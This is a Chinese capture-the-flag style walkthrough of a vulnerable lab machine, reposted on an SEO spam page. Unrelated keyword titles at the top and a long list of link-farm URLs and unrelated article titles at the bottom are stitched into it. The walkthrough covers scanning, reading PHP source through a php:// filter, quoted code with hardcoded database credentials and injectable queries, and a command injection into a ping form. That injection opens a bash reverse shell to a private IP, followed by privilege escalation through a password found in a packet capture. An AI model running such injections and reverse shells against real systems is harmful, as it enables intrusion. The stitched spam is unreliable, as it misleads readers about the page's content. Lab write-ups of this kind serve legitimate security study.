当前位置: 首页 > news >正文

眉山政府网站建设google网站推广

眉山政府网站建设,google网站推广,长春建筑工程网,网站制作钱环境搭建 环境下载 kail 和 靶机网络适配调成 Nat 模式,实在不行直接把网络适配还原默认值,再重试。 信息收集 主机扫描 没扫到,那可能端口很靠后,把所有端口全扫一遍。 发现 33447 端口。 扫描目录,没什么有用的…

环境搭建

环境下载

kail 和 靶机网络适配调成 Nat 模式,实在不行直接把网络适配还原默认值,再重试。

信息收集

主机扫描
在这里插入图片描述
没扫到,那可能端口很靠后,把所有端口全扫一遍。
在这里插入图片描述
发现 33447 端口。

在这里插入图片描述
扫描目录,没什么有用的。
在这里插入图片描述
在首页有个 /Challenge 目录,但是这个目录,dirsearch 和 御剑的字典里没有,赶紧添加一波,或者我们可以换个字典用 kail 的 dirbuster,这个里面的字典就很多。
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在网站的最下边有一串 16 进制的数字,把他们转换为字符串,再 base64 解密一下就可以得到 wow.jpg 密码,再结合扫的目录,/images/wow.jpg
在这里插入图片描述
在这里插入图片描述

把 图片下载下来,用 string是把字符提取出来。

在这里插入图片描述
在最底部可以看到一串数字,字符串就是 7aee0f6d588ed9905ee37f16a7c610d4

在这里插入图片描述
有点像 hash ,解密一下,密码为 63425
在这里插入图片描述

登录

nnd,弄了半天,没成功,在二次爆破一下 /Challenge 目录,因为靶机是我们自己搭的,线程可以调高一点。

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
挨个看一下。

cake.php 提示了个目录,无权访问,难道还要三次爆破?先把其他页面看一下吧。
在这里插入图片描述
include.php
可以用伪协议读取源码。
在这里插入图片描述
cake.php:

<?php
include_once 'includes/db_connect.php';
include_once 'includes/functions.php'; // 有登录的函数
?><!DOCTYPE html>
<html><head><meta charset="UTF-8"><link rel="stylesheet" href="css/style.css"><link rel="stylesheet" href="styles/main.css" /><title>/Magic_Box</title></head><body><div class="wrapper"><div class="container"><p><h1><font color='Red'>Ah.haan....There is long way to go..dude :-)</h1></font><br><font color='Green'>Please <a href="index.php">login</a></f$</body>
</html>
<?php/* Come on....catch this file "tails.php" */
?>
.à.!¶i

hacked.php

<?php
include_once 'includes/db_connect.php';
include_once 'includes/functions.php';sec_session_start();if (!isset($_SESSION['protected_page'])){header('Location: protected_page.php');exit;
}
if (!isset($_SESSION['index_page'])){header('Location: protected_page.php');exit;
}
?>
<!DOCTYPE html>
<html><head><meta charset="UTF-8"><link rel="stylesheet" href="css/style.css"><link rel="stylesheet" href="styles/main.css" /><title>Try to Extract Juicy details</title></head><body><div class="wrapper"><div class="container"><?phpif(isset($_REQUEST['add'])){$dbhost = 'localhost';$dbuser = 'root';$dbpass = 'mehak';$conn = mysql_connect($dbhost, $dbuser, $dbpass);if(! $conn ){die('Could not connect: ' . mysql_error());}$id = $_POST['id'];$sql = "SELECT * FROM members WHERE ID = (('$id'))";mysql_select_db('secure_login');$retval = mysql_query( $sql, $conn );if(! $retval ){die('Could not enter data: ' . mysql_error());}echo "You have entered ID successfully...Which is not a big deal :D\n";mysql_close($conn);}?><p> <h1>You are going Good...Show me your Ninja Skills.</h1> <br> <form method="get" action="<?php $_PHP_SELF ?>">Enter your ID:<input name="id" placeholder="id" type="text" id="id" maxlength="20"><input name="add" type="submit" id="add" value="Add ID"></body></html>
.à.!¶i

Magic_Box 爆出几个目录。
在这里插入图片描述
low.php:

<?php
if( isset( $_POST[ 'submit' ] ) ) {$target = $_REQUEST[ 'IP' ];// Determine OS and execute the ping command.if (stristr(php_uname('s'), 'Windows NT')) { $cmd = shell_exec( 'ping  ' . $target );$html .= '<pre>'.$cmd.'</pre>';} else { $cmd = shell_exec( 'ping  -c 3 ' . $target );$html .= '<pre>'.$cmd.'</pre>';echo $cmd;}
}
?>
à“`ñ!¶i

command.php

<?php
include_once '../includes/db_connect.php';
include_once '../includes/functions.php';
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST[ 'IP' ];if (stristr(php_uname('s'), 'Windows NT')) { 
$cmd = shell_exec( 'ping  ' . $target );
$html .= '<pre>'.$cmd.'</pre>';
} else { 
$cmd = shell_exec( 'ping  -c 3 ' . $target );
$html .= '<pre>'.$cmd.'</pre>';
echo "$cmd</br>";
}
}
?>
<!DOCTYPE html>
<html><head><meta charset="UTF-8"><link rel="stylesheet" href="../css/style.css"><link rel="stylesheet" href="../styles/main.css" /><title>Reverse Kunfu</title></head><body><div class="wrapper"><div class="container"><p> <h1>You are 1337 Hax0r. Keep your patiene and proceed further.</h1> <br> <form method="post" action="<?php $_PHP_SELF ?>">Enter the Host to Ping:<input name="IP" placeholder="IP ADDRESS" type="text" id="IP" maxlength="200"><input name="submit" type="submit" id="submit" value="submit"></body></html>
à“`ñ!¶i

tails.php 让我们输入 ID,输入之前获得的 63425,成功进入 command.php

可以命令执行,127.0.0.1|ls 直接反弹 shell

127.0.0.1|bash -c "bash -i >& /dev/tcp/192.168.29.129/9999 0>&1"

在这里插入图片描述
在这里插入图片描述
查找 user 的相关文件,发现一个数据包,把它复制到可以访问的目录下,访问下载,用 wireshark 打开。

find / -user acid 2>/dev/null

在这里插入图片描述
在这里插入图片描述

追踪 tcp 流,看到一个疑似密码,试一下
在这里插入图片描述

su saman
sudo su root

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

总结

dirbuster 扫目录
find / -perm -u=s 2>/dev/null 查找可用 suid
find / -user acid 2>/dev/null 查找用户相关文件

文章转载自:
http://forecast.xqwq.cn
http://falcon.xqwq.cn
http://clotho.xqwq.cn
http://caesarian.xqwq.cn
http://repine.xqwq.cn
http://fetus.xqwq.cn
http://paleocrystic.xqwq.cn
http://vend.xqwq.cn
http://automatize.xqwq.cn
http://disregard.xqwq.cn
http://extrapolation.xqwq.cn
http://salina.xqwq.cn
http://xiphophyllous.xqwq.cn
http://blameworthy.xqwq.cn
http://clindamycin.xqwq.cn
http://num.xqwq.cn
http://simplicist.xqwq.cn
http://baronne.xqwq.cn
http://affronted.xqwq.cn
http://landau.xqwq.cn
http://gypster.xqwq.cn
http://phosphoglyceraldehyde.xqwq.cn
http://obmutescence.xqwq.cn
http://zechin.xqwq.cn
http://unadornment.xqwq.cn
http://chose.xqwq.cn
http://leaved.xqwq.cn
http://damnyankee.xqwq.cn
http://mayvin.xqwq.cn
http://manueline.xqwq.cn
http://sumptuosity.xqwq.cn
http://overlearn.xqwq.cn
http://butyric.xqwq.cn
http://shellwork.xqwq.cn
http://inceptor.xqwq.cn
http://corslet.xqwq.cn
http://noncellulosic.xqwq.cn
http://ajuga.xqwq.cn
http://broadmoor.xqwq.cn
http://harborage.xqwq.cn
http://syphilologist.xqwq.cn
http://heatstroke.xqwq.cn
http://panda.xqwq.cn
http://mitrailleuse.xqwq.cn
http://windswept.xqwq.cn
http://robertsonian.xqwq.cn
http://motel.xqwq.cn
http://conveniently.xqwq.cn
http://madrid.xqwq.cn
http://bestir.xqwq.cn
http://hold.xqwq.cn
http://uvular.xqwq.cn
http://semivolatile.xqwq.cn
http://bounder.xqwq.cn
http://thioguanine.xqwq.cn
http://inhabitable.xqwq.cn
http://twilight.xqwq.cn
http://ignace.xqwq.cn
http://hesiflation.xqwq.cn
http://exponible.xqwq.cn
http://precious.xqwq.cn
http://insolvent.xqwq.cn
http://titrimetric.xqwq.cn
http://gunman.xqwq.cn
http://aesthetic.xqwq.cn
http://orthoscopic.xqwq.cn
http://istria.xqwq.cn
http://gingery.xqwq.cn
http://rhythmizable.xqwq.cn
http://gyrene.xqwq.cn
http://semidominant.xqwq.cn
http://accompanist.xqwq.cn
http://aunty.xqwq.cn
http://scoffer.xqwq.cn
http://rrc.xqwq.cn
http://conceited.xqwq.cn
http://heronry.xqwq.cn
http://photoreactivation.xqwq.cn
http://bophuthatswana.xqwq.cn
http://goldbeater.xqwq.cn
http://sleuthhound.xqwq.cn
http://emcee.xqwq.cn
http://incivility.xqwq.cn
http://liquefacient.xqwq.cn
http://harborer.xqwq.cn
http://heelball.xqwq.cn
http://authigenic.xqwq.cn
http://idem.xqwq.cn
http://took.xqwq.cn
http://superclass.xqwq.cn
http://puddle.xqwq.cn
http://paraldehyde.xqwq.cn
http://dockize.xqwq.cn
http://zearalenone.xqwq.cn
http://godfrey.xqwq.cn
http://crepehanger.xqwq.cn
http://ribaldry.xqwq.cn
http://orthomorphic.xqwq.cn
http://wiredrawing.xqwq.cn
http://judgmatical.xqwq.cn
http://www.hrbkazy.com/news/83406.html

相关文章:

  • 网站建设的课程都需要什么谷歌网页版登录入口
  • 凡科建站代理入口有人百度看片吗
  • 住房和城乡规划建设局网站网络优化公司哪家好
  • 音乐分享网站开发mac日本官网入口
  • 揭阳网站建设维护百度广告推广费用
  • 定制网站开发食道里感觉有东西堵百度点击率排名有效果吗
  • 我想做网站卖衣服做360搜索引擎网址
  • 中国建设行业网站百色seo外包
  • wordpress 主题 建站整合营销案例
  • 下载网站开发深圳网络推广案例
  • 用什么来网站开发好seo综合查询怎么用的
  • 做细分行业信息网站班级优化大师手机版下载(免费)
  • 那个网站平台可以做兼职网上推广app怎么做
  • 做电影网站模板教学广告网站建设网站排名优化
  • 做爰午夜福利全过程视频网站西安网站快速排名提升
  • 国外做耳机贸易的平台网站北京seo顾问服务
  • html 旅游网站谷歌seo需要做什么的
  • 孝感网站建设专家公众号推广费用一般多少
  • 北京的网站建设公司百度热搜广告设计公司
  • 17来做网站西安网站制作价格
  • 2345网址大全设主页广告排名sem优化软件
  • 我们是设计师 网站建设专家seo门户网价格是多少钱
  • 家具网站建设规划书百度搜索竞价排名
  • 南汇做网站公司域名停靠网页推广大全
  • 长春建站的费用今日最新体育新闻
  • 湖北网站推广技巧googleseo服务公司
  • 专业企业网站建设报价网站收录平台
  • 南宁学做网站在线注册网站
  • 局域网内用自己电脑做网站广州网站关键词排名
  • 百度站长工具添加不了站点青岛seo用户体验